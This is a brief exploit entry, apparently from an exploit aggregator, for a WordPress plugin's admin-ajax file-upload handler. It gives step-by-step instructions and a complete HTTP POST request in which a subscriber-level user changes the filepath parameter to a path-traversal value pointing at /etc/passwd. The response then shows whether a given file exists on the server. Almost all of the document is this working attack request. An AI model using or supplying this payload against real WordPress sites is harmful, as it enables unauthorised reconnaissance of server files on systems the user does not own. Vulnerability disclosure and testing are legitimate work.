Share
## https://sploitus.com/exploit?id=WPEX-ID:9D4A3F09-B011-4D87-AB63-332E505CF1CD
As a subscriber, submit a dummy image on a page/post with a File Upload field is embed, intercept the request and change the file path parameter

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 158
Connection: close
Cookie: [subscriber+]

field_name=test&filepath=/../../../../../../../../etc/passwd&field_id=um_field_4&form_key=Upload&action=um_show_uploaded_file&pf_nonce=4286c1c56a&is_ajax=true

If the response contains the um_remove_file, then the file exist on the server, otherwise it does not